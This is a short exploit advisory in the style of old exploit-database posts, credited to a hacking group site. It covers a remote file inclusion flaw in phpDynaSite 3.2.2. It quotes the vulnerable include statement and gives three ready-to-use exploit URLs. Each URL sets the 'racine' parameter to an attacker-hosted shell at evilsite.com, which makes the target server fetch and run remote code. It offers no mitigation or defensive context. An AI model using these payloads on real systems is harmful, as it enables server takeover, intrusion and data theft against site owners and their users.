phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

********************************************************************************************************** WwW.Deltahacking.NeT ********************************************************************************************************** * dynasite3.2.2 * Class = Remote File Inclusion ; * Download = http://jaist.dl.sourceforge.net:80/sourceforge/phpdynasite/dynasite3.2.2.tar.gz * Found by = Dr.Pantagon (rezayavari2006@yahoo.com) ------------------------------------------------------------------------------------------------------------------- - Vulnerable Code include($racine."connection.php"); ++++++++++++++++++++++++++++++++++++++++++++ - Exploit: http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell? http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell? http://[target]/[path]/connection.php?racine=http://evilsite.com/shell? ------------------------------------------------------------------------------------------------------------------ Gr33tz: Dr.Torojan **************************************************************************************************************